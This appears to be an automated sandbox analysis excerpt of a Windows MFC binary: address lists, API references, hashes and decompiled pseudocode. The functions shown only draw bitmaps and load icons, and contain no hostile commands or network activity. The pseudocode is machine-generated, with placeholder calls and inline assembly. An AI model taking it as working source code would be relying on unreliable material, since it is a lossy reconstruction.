0x00408f63
0x00408f66
0x00408f6b
0x00408f73
0x00408f78
0x00408f80
0x00408f85
0x00408f8d
0x00408f92
0x00408f98
0x00408f9b
0x00408f9e
0x00408fa3
0x00408fa4
0x00408fa9
0x00408faf
0x00408fb2
0x00408fb7
0x00408fbf
0x00408fc4
0x00408fca
0x00408fcf
0x00408fd2
0x00408fdc
0x00408fe1
0x00000000
0x00000000
0x00408fe7
0x00408fe9
0x00408fec
0x00408ff1
0x00408ff2
0x00408ff7
0x00408ffa
0x00408ffc
0x00408fff
0x00409004
0x00409008
0x00409009
0x0040900e
0x00409011
0x00409012
0x00409015
0x0040901a
0x0040901e
0x0040901f
0x00409027
0x0040902b
0x00409030
0x00409032
0x00409037
0x0040903c
0x0040903d
0x00409042
0x00409048
0x0040904c
0x00409054
0x00409058
0x00409060
0x00409064
0x00409069
0x0040906f
0x00409074
0x00409074
0x00408fd2
0x0040908c
0x0040908f
0x00409096
0x004090a2
0x004090aa
0x004090af
0x004090b5
0x004090b8
0x004090bb
0x004090bc
0x004090c4
0x004090c5
0x004090c7
0x004090ca
0x00409098
0x0040909b
0x0040909b
0x00409096
0x004090d5
0x004090d9
0x004090e4
0x004090e8
0x00408e73
0x00408e73
0x00408e75
0x00408e76
0x00408e7b
0x00408e7b
0x004090f0
0x004090f4
0x004090fc
0x00409100
0x00409108
0x0040910c
0x00409114
0x00409118
0x00409120
0x00409124
0x0040912c
0x0040912f
0x00409134
0x0040913b
0x00409145
0x0040914e

APIs

_EH_prolog.MSVCRT ref: 00408DD0
#533.MFC42 ref: 00408DE6
#540.MFC42 ref: 00408E05
#540.MFC42 ref: 00408E18
#540.MFC42 ref: 00408E24
#540.MFC42 ref: 00408E30
#540.MFC42 ref: 00408E3C
#540.MFC42 ref: 00408E48
#540.MFC42 ref: 00408E54
SendMessageA.USER32 ref: 00408E6D
#1199.MFC42(00008061,00000000,000000FF), ref: 00408E7B
#4160.MFC42(0000805B), ref: 00408E8D
#4160.MFC42(0000805C,0000805B), ref: 00408E9A
#355.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408EB5
#2515.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408EC4
#3499.MFC42(?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408EDC
#858.MFC42(00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408EEB
#800.MFC42(00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408EF7
#5194.MFC42(00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408F0F
#4160.MFC42(00000080,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408F27
#4160.MFC42(00008073,00000080,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408F34
#4160.MFC42(00008060,00008073,00000080,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00408F41
#2818.MFC42(?,%s - %s%s,?,?,?,00008060,00008073,00000080,00001001,00000000,00000000,?,00000000,?,00000006,?), ref: 00408F58
#6407.MFC42(?,0000805C,0000805B), ref: 00408F66
#4160.MFC42(00008053,?,0000805C,0000805B), ref: 00408F73
#4160.MFC42(00008062,00008053,?,0000805C,0000805B), ref: 00408F80
#4160.MFC42(00008054,00008062,00008053,?,0000805C,0000805B), ref: 00408F8D
#2818.MFC42(?,%s %s%s,?,?,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 00408FA4
#6407.MFC42(?,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 00408FB2
#4160.MFC42(00008060,?,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 00408FBF
#6407.MFC42(?,00008060,?,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 00408FCA
SendMessageA.USER32 ref: 00408FDC
#3301.MFC42(?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 00408FF2
#3301.MFC42(?,?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 00409009
#3301.MFC42(?,?,00000000,?,?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040901F
#2818.MFC42(?,%s %s%s,00000000,?,?,?,?,00000000,?,?,00000001,?,?,00000002,?,00008054), ref: 0040903D
#800.MFC42(?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040904C
#800.MFC42(?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 00409058
#800.MFC42(?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 00409064
#6407.MFC42(?,?,00000001,?,?,00000002,?,00008054,00008062,00008053,?,0000805C,0000805B), ref: 0040906F
#1997.MFC42(00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040909B
#4160.MFC42(0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090AA
#2818.MFC42(?,?,0000805D,00001001,00000000,00000000,?,00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090BC
#1200.MFC42(?,00000010,00000000), ref: 004090CA
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090D9
#641.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090E8
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 004090F4
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409100
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040910C
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409118
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 00409124
#800.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040912F
#798.MFC42(00000000,?,00000006,?,00000000,0000805C,0000805B), ref: 0040913B

Strings

L!D, xrefs: 00408EE2
%s %s%s, xrefs: 00408F9E
%s - %s%s, xrefs: 00408F52
L!D, xrefs: 00408E00
%s %s%s, xrefs: 00409037

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #800$#4160$#540$#2818#6407$#3301$MessageSend$#1199#1200#1997#2515#3499#355#5194#533#641#798#858H_prolog
String ID: %s %s%s$%s %s%s$%s - %s%s$L!D$L!D
API String ID: 2171470616-2221673170
Opcode ID: 2c5c578bfed54e8f7af3270307fa24bb0ebd89c19dbe9d5e838524361518fd7f
Instruction ID: 16208fa7dbf2cbf43e615d7487cbf87da4de86da4f2b27f690bbdf5b0c88dd42
Opcode Fuzzy Hash: 2c5c578bfed54e8f7af3270307fa24bb0ebd89c19dbe9d5e838524361518fd7f
Instruction Fuzzy Hash: 55A18030E00659EEDF01EBE1D946AEEBB74AF14308F90405EE501721D2DBB91B19DB6A

Uniqueness

Uniqueness Score: -1.00%

Function 00401762, Relevance: 87.8, APIs: 47, Strings: 3, Instructions: 279
windowCOMMON

Download Yara Rule

C-Code - Quality: 63%

			E00401762(void* __eflags) {
				signed int _t127;
				intOrPtr _t129;
				intOrPtr _t130;
				int _t147;
				signed int _t175;
				intOrPtr _t176;
				intOrPtr _t177;
				int _t210;
				void* _t218;

				L004269E6();
				L004264B0();
				_t210 = 0;
				 *(_t218 - 4) = 0;
				_push(CreateCompatibleDC(0));
				L004264AA();
				L00401974(_t218 - 0x18);
				 *(_t218 - 0x18) = 0x42e34c;
				_t6 = _t218 + 0x18; // 0x42e34c
				 *(_t218 - 4) = 1;
				_push(CreateCompatibleBitmap( *(_t218 - 0x44),  *(_t218 + 0x14),  *_t6));
				L004264BC();
				asm("sbb eax, eax");
				_t127 =  ~(_t218 - 0x18) &  *(_t218 - 0x14);
				_push(_t127);
				_push( *(_t218 - 0x44));
				L00426540();
				 *(_t218 - 0x10) = _t127;
				L004264B0();
				 *(_t218 - 4) = 2;
				_push(CreateCompatibleDC(0));
				L004264AA();
				_t129 =  *((intOrPtr*)(_t218 + 0x1c));
				if(_t129 != 0) {
					_t130 =  *((intOrPtr*)(_t129 + 4));
				} else {
					_t130 = 0;
				}
				_push(_t130);
				_push( *(_t218 - 0x34));
				L00426540();
				 *((intOrPtr*)(_t218 + 0x1c)) = _t130;
				PatBlt( *(_t218 - 0x44), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18), 0xff0062);
				_push(GetSysColor(0xf));
				L00426678();
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x44), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x38) &  *(_t218 - 0x34),  *(_t218 + 0x20),  *(_t218 + 0x24), 0xcc0020);
				_push(GetSysColor(0x14));
				L00426678();
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x44), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x38) &  *(_t218 - 0x34),  *(_t218 + 0x20),  *(_t218 + 0x24), 0xee0086);
				_push( *((intOrPtr*)(_t218 + 0x28)));
				_push( *(_t218 + 0x18));
				_push( *(_t218 + 0x14));
				_push(_t210);
				_push(_t210);
				L0042671A();
				_push(_t210);
				L00426678();
				_push(0xffffff);
				L00426672();
				 *(_t218 - 0x24) = _t210;
				 *((intOrPtr*)(_t218 - 0x28)) = 0x42e55c;
				 *(_t218 - 0x1c) = _t210;
				 *(_t218 - 0x20) = 0x42e55c;
				 *(_t218 - 4) = 4;
				_push(CreateSolidBrush(GetSysColor(0x14)));
				L004264BC();
				_push(CreateSolidBrush(GetSysColor(0x10)));
				L004264BC();
				_t147 = _t218 - 0x20;
				_push(_t147);
				L00426570();
				 *(_t218 + 0x24) = _t147;
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x34), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x48) &  *(_t218 - 0x44), _t210, _t210, 0xe20746);
				asm("sbb eax, eax");
				BitBlt( *( *((intOrPtr*)(_t218 + 8)) + 4),  *(_t218 + 0xc) + 1,  *(_t218 + 0x10) + 1,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x38) &  *(_t218 - 0x34), _t210, _t210, 0xcc0020);
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x34), 1, 1,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x48) &  *(_t218 - 0x44), _t210, _t210, 0xe20746);
				_push(_t218 - 0x28);
				L00426570();
				asm("sbb eax, eax");
				BitBlt( *(_t218 - 0x34), _t210, _t210,  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x48) &  *(_t218 - 0x44), _t210, _t210, 0xe20746);
				asm("sbb eax, eax");
				BitBlt( *( *((intOrPtr*)(_t218 + 8)) + 4),  *(_t218 + 0xc),  *(_t218 + 0x10),  *(_t218 + 0x14),  *(_t218 + 0x18),  ~(_t218 - 0x38) &  *(_t218 - 0x34), _t210, _t210, 0xcc0020);
				_t175 =  *(_t218 - 0x10);
				if(_t175 != _t210) {
					_t176 =  *((intOrPtr*)(_t175 + 4));
				} else {
					_t176 = 0;
				}
				_push(_t176);
				_push( *(_t218 - 0x44));
				L00426540();
				L004264A4();
				_push( *(_t218 + 0x24));
				L00426570();
				_t177 =  *((intOrPtr*)(_t218 + 0x1c));
				if(_t177 != _t210) {
					_t210 =  *(_t177 + 4);
				}
				_push(_t210);
				_push( *(_t218 - 0x34));
				L00426540();
				L004264A4();
				L00425FA6();
				L00425FA6();
				L00425FA6();
				 *(_t218 - 0x20) = 0x42c514;
				 *(_t218 - 4) = 5;
				L00425FA6();
				 *((intOrPtr*)(_t218 - 0x28)) = 0x42c514;
				 *(_t218 - 0x20) = 0x42c4fc;
				 *(_t218 - 4) = 6;
				L00425FA6();
				 *((intOrPtr*)(_t218 - 0x28)) = 0x42c4fc;
				 *(_t218 - 4) = 1;
				L0042649E();
				 *(_t218 - 0x18) = 0x42c514;
				 *(_t218 - 4) = 7;
				L00425FA6();
				 *(_t218 - 4) =  *(_t218 - 4) | 0xffffffff;
				 *(_t218 - 0x18) = 0x42c4fc;
				L0042649E();
				 *[fs:0x0] =  *((intOrPtr*)(_t218 - 0xc));
				return _t177;
			}

0x00417986
0x00417993
0x0041799e
0x004179a1
0x004179a6
0x004179aa
0x004179b2
0x004179b7
0x004179be
0x004179c1
0x004179d1
0x004179d5
0x004179df
0x004179e1
0x004179e4
0x004179e5
0x004179e8
0x004179f0
0x004179f3
0x004179f9
0x004179ff
0x00417a03
0x00417a08
0x00417a0d
0x00417a13
0x00417a0f
0x00417a0f
0x00417a0f
0x00417a17
0x00417a18
0x00417a1b
0x00417a25
0x00417a33
0x00417a43
0x00417a47
0x00417a62
0x00417a73
0x00417a79
0x00417a7d
0x00417a92
0x00417aa3
0x00417aa5
0x00417aab
0x00417aae
0x00417ab1
0x00417ab2
0x00417ab3
0x00417ab8
0x00417abc
0x00417ac1
0x00417ac9
0x00417ad3
0x00417ad6
0x00417ad9
0x00417adc
0x00417ae1
0x00417aee
0x00417af2
0x00417b02
0x00417b06
0x00417b0b
0x00417b11
0x00417b12
0x00417b17
0x00417b1f
0x00417b38
0x00417b44
0x00417b62
0x00417b6a
0x00417b7f
0x00417b87
0x00417b88
0x00417b93
0x00417ba6
0x00417bad
0x00417bcc
0x00417bce
0x00417bd4
0x00417bda
0x00417bd6
0x00417bd6
0x00417bd6
0x00417bdd
0x00417bde
0x00417be1
0x00417be9
0x00417bee
0x00417bf4
0x00417bf9
0x00417bfe
0x00417c00
0x00417c00
0x00417c03
0x00417c04
0x00417c07
0x00417c0f
0x00417c17
0x00417c1f
0x00417c27
0x00417c31
0x00417c37
0x00417c3b
0x00417c45
0x00417c48
0x00417c4e
0x00417c52
0x00417c5a
0x00417c5d
0x00417c61
0x00417c66
0x00417c6c
0x00417c70
0x00417c75
0x00417c7c
0x00417c7f
0x00417c89
0x00417c91

APIs

_EH_prolog.MSVCRT ref: 00417986
#323.MFC42 ref: 00417993
CreateCompatibleDC.GDI32(00000000), ref: 004179A4
#1640.MFC42(00000000), ref: 004179AA
CreateCompatibleBitmap.GDI32(?,?,LB), ref: 004179CB
#1641.MFC42(00000000), ref: 004179D5
#5785.MFC42(?,?,00000000), ref: 004179E8
#323.MFC42(?,?,00000000), ref: 004179F3
CreateCompatibleDC.GDI32(00000000), ref: 004179FD
#1640.MFC42(00000000), ref: 00417A03
#5785.MFC42(?,00000002,?,00000000), ref: 00417A1B
PatBlt.GDI32(?,00000000,00000000,?,0042E34C,00FF0062), ref: 00417A33
GetSysColor.USER32(0000000F), ref: 00417A41
#5873.MFC42(00000000,?,00000000), ref: 00417A47
BitBlt.GDI32(?,00000000,00000000,?,0042E34C,?,?,?,00CC0020), ref: 00417A73
GetSysColor.USER32(00000014), ref: 00417A77
#5873.MFC42(00000000,?,00000000), ref: 00417A7D
BitBlt.GDI32(?,00000000,00000000,?,0042E34C,?,?,?,00EE0086), ref: 00417AA3
#2753.MFC42(00000000,00000000,?,0042E34C,?,?,00000000), ref: 00417AB3
#5873.MFC42(00000000,00000000,00000000,?,0042E34C,?,?,00000000), ref: 00417ABC
#6172.MFC42(00FFFFFF,00000000,00000000,00000000,?,0042E34C,?,?,00000000), ref: 00417AC9
GetSysColor.USER32(00000014), ref: 00417AE5
CreateSolidBrush.GDI32(00000000), ref: 00417AE8
#1641.MFC42(00000000,?,00000000), ref: 00417AF2
GetSysColor.USER32(00000010), ref: 00417AF9
CreateSolidBrush.GDI32(00000000), ref: 00417AFC
#1641.MFC42(00000000,?,00000000), ref: 00417B06
#5787.MFC42(?,00000000,?,00000000), ref: 00417B12
BitBlt.GDI32(?,00000000,00000000,?,0042E34C,?,00000000,00000000,00E20746), ref: 00417B38
BitBlt.GDI32(00000004,?,?,?,0042E34C,?,00000000,00000000,00CC0020), ref: 00417B62
BitBlt.GDI32(?,00000001,00000001,?,0042E34C,?,00000000,00000000,00E20746), ref: 00417B7F
#5787.MFC42(?,?,00000000), ref: 00417B88
BitBlt.GDI32(?,00000000,00000000,?,0042E34C,?,00000000,00000000,00E20746), ref: 00417BA6
BitBlt.GDI32(00000004,?,?,?,0042E34C,?,00000000,00000000,00CC0020), ref: 00417BCC
#5785.MFC42(?,00000004,00000000), ref: 00417BE1
#2405.MFC42(?,00000004,00000000), ref: 00417BE9
#5787.MFC42(?,?,00000004,00000000), ref: 00417BF4
#5785.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C07
#2405.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C0F
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C17
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C1F
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C27
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C3B
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C52
#640.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C61
#2414.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C70
#640.MFC42(?,00000000,?,?,00000004,00000000), ref: 00417C7F

Strings

LB, xrefs: 004179B7
LB, xrefs: 004179BE
\B, xrefs: 00417ACE

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296526512.0000000000488000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296532350.0000000000498000.00000002.00020000.sdmp Download File

Similarity

API ID: #2414$Create$#5785Color$#1641#5787#5873Compatible$#1640#2405#323#640BrushSolid$#2753#6172BitmapH_prolog
String ID: LB$LB$\B
API String ID: 4144306126-2660138642
Opcode ID: e028aa8c550cf5321776d7dadc7c3a410938a9dad3aeb4b5a035b41f2c367697
Instruction ID: 125ffb72028a29474156ab81f639c779b758b553aebaaae3ef33e9ce92ff0dd7
Opcode Fuzzy Hash: e028aa8c550cf5321776d7dadc7c3a410938a9dad3aeb4b5a035b41f2c367697
Instruction Fuzzy Hash: 28A1497290015DBECF01EFA1ED46EEEBFB9EF58304F10011AF901A2161DB389A95DB64

Uniqueness

Uniqueness Score: -1.00%

Function 004013AC, Relevance: 69.2, APIs: 46, Instructions: 192
windowCOMMON

Download Yara Rule

C-Code - Quality: 52%

			E004013AC(void* __ecx, void* __eflags, intOrPtr _a4) {
				int _v4;
				int _v8;
				int _v12;
				void* _v16;
				void* _t25;
				char* _t30;
				long _t62;
				signed int _t65;
				int _t66;
				void* _t74;
				void* _t76;

				_t74 = __ecx;
				_t25 = L00401D4D(__ecx, _a4);
				_t66 = _t65 | 0xffffffff;
				if(_t25 == _t66) {
					L3:
					return _t66;
				} else {
					_push(0x4d2);
					_push(__ecx);
					 *(__ecx + 0x7c) =  *(__ecx + 0x7c) & 0x000000f0 | 0x00000020;
					_t30 =  &_v16;
					_push(_t30);
					_push(0x5000001f);
					_v16 = 0;
					_v12 = 0;
					_v8 = 0;
					_v4 = 0;
					L00426108();
					if(_t30 != 0) {
						SendMessageA( *(__ecx + 0x134), 0x1036, 0, 0x20);
						_push(0);
						_push(0x200);
						_push(0);
						L00426102();
						_push(1);
						_push(1);
						_push(1);
						_push(0x10);
						_push(0x10);
						L00426000();
						L00425E44();
						_push(0x90);
						_t76 = 0xe;
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), _t66, LoadIconA(0x90, 0x90));
						L00425E44();
						_push(0x91);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x91, 0x91));
						L00425E44();
						_push(0x92);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x92, 0x92));
						L00425E44();
						_push(0x93);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x93, 0x93));
						L00425E44();
						_push(0x94);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x94, 0x94));
						L00425E44();
						_push(0x95);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x95, 0x95));
						L00425E44();
						_push(0x96);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x96, 0x96));
						L00425E44();
						_push(0x97);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x97, 0x97));
						L00425E44();
						_push(0x98);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x98, 0x98));
						L00425E44();
						_push(0x99);
						_push(_t76);
						L00425FFA();
						ImageList_ReplaceIcon( *(_t74 + 0x110), 0xffffffff, LoadIconA(0x99, 0x99));
						_t62 = _t74 + 0x10c;
						if(_t62 != 0) {
							_t62 =  *(_t62 + 4);
						}
						_push(SendMessageA( *(_t74 + 0x134), 0x1003, 1, _t62));
						L00425FF4();
						return 0;
					}
					goto L3;
				}
			}

0x0040a8d5
0x0040a8d7
0x0040a8dc
0x0040a8e1
0x0040a920
0x00000000
0x0040a8e3
0x0040a8e6
0x0040a8f5
0x0040a8f6
0x0040a8f9
0x0040a8ff
0x0040a900
0x0040a907
0x0040a90b
0x0040a90f
0x0040a913
0x0040a917
0x0040a91e
0x0040a935
0x0040a93b
0x0040a93c
0x0040a941
0x0040a944
0x0040a949
0x0040a94b
0x0040a94d
0x0040a94f
0x0040a957
0x0040a959
0x0040a95e
0x0040a968
0x0040a96b
0x0040a96c
0x0040a96e
0x0040a98a
0x0040a98c
0x0040a996
0x0040a997
0x0040a999
0x0040a9aa
0x0040a9ac
0x0040a9b6
0x0040a9b7
0x0040a9b9
0x0040a9ca
0x0040a9cc
0x0040a9d6
0x0040a9d7
0x0040a9d9
0x0040a9ea
0x0040a9ec
0x0040a9f6
0x0040a9f7
0x0040a9f9
0x0040aa0a
0x0040aa0c
0x0040aa16
0x0040aa17
0x0040aa19
0x0040aa2a
0x0040aa2c
0x0040aa36
0x0040aa37
0x0040aa39
0x0040aa4a
0x0040aa4c
0x0040aa56
0x0040aa57
0x0040aa59
0x0040aa6a
0x0040aa6c
0x0040aa76
0x0040aa77
0x0040aa79
0x0040aa8a
0x0040aa8c
0x0040aa96
0x0040aa97
0x0040aa99
0x0040aaaa
0x0040aaac
0x0040aab4
0x0040aab6
0x0040aab6
0x0040aacd
0x0040aace
0x00000000
0x0040aad3
0x00000000
0x0040a91e

APIs

#2100.MFC42(5000001F,000004D2,?,000004D2,?), ref: 0040A917
SendMessageA.USER32 ref: 0040A935
#4287.MFC42(00000000,00000200,00000000,?,000004D2,?), ref: 0040A944
#2096.MFC42(00000010,00000010,00000001,00000001,00000001,00000000,00000200,00000000,?,000004D2,?), ref: 0040A959
#1168.MFC42(00000010,00000010,00000001,00000001,00000001,00000000,00000200,00000000,?,000004D2,?), ref: 0040A95E
#1146.MFC42(00000090,0000000E,00000090,00000010,00000010,00000001,00000001,00000001,00000000,00000200,00000000,?,000004D2,?), ref: 0040A96E
LoadIconA.USER32(00000000,00000090), ref: 0040A97A
ImageList_ReplaceIcon.COMCTL32(?,?,00000000,?,000004D2,?), ref: 0040A98A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040A98C
#1146.MFC42(00000091,0000000E,00000091,?,00000000,?,000004D2,?), ref: 0040A999
LoadIconA.USER32(00000000,00000091), ref: 0040A99F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040A9AA
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040A9AC
#1146.MFC42(00000092,0000000E,00000092,?,00000000,?,000004D2,?), ref: 0040A9B9
LoadIconA.USER32(00000000,00000092), ref: 0040A9BF
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040A9CA
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040A9CC
#1146.MFC42(00000093,0000000E,00000093,?,00000000,?,000004D2,?), ref: 0040A9D9
LoadIconA.USER32(00000000,00000093), ref: 0040A9DF
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040A9EA
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040A9EC
#1146.MFC42(00000094,0000000E,00000094,?,00000000,?,000004D2,?), ref: 0040A9F9
LoadIconA.USER32(00000000,00000094), ref: 0040A9FF
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA0A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA0C
#1146.MFC42(00000095,0000000E,00000095,?,00000000,?,000004D2,?), ref: 0040AA19
LoadIconA.USER32(00000000,00000095), ref: 0040AA1F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA2A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA2C
#1146.MFC42(00000096,0000000E,00000096,?,00000000,?,000004D2,?), ref: 0040AA39
LoadIconA.USER32(00000000,00000096), ref: 0040AA3F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA4A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA4C
#1146.MFC42(00000097,0000000E,00000097,?,00000000,?,000004D2,?), ref: 0040AA59
LoadIconA.USER32(00000000,00000097), ref: 0040AA5F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA6A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA6C
#1146.MFC42(00000098,0000000E,00000098,?,00000000,?,000004D2,?), ref: 0040AA79
LoadIconA.USER32(00000000,00000098), ref: 0040AA7F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AA8A
#1168.MFC42(?,00000000,?,000004D2,?), ref: 0040AA8C
#1146.MFC42(00000099,0000000E,00000099,?,00000000,?,000004D2,?), ref: 0040AA99
LoadIconA.USER32(00000000,00000099), ref: 0040AA9F
ImageList_ReplaceIcon.COMCTL32(?,000000FF,00000000,?,00000000,?,000004D2,?), ref: 0040AAAA
SendMessageA.USER32 ref: 0040AAC7
#2862.MFC42(00000000,?,00000000,?,000004D2,?), ref: 0040AACE

Memory Dump Source

Source File: 00000000.00000002.296246322.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 00000000.00000002.296237662.0000000000400000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296340892.000000000042C000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296349098.0000000000434000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296357716.0000000000440000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296366506.0000000000443000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296370536.0000000000444000.00000004.00020000.sdmp Download File
Associated: 00000000.00000002.296409017.0000000000446000.00000008.00020000.sdmp Download File
Associated: 00000000.00000002.296413707.0000000000447000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296426801.0000000000466000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296434675.000000000046D000.00000002.00020000.sdmp Download File
Associated: 00000000.00000002.296518854.000000000047E000.00000002.00020000.sdmp Download File
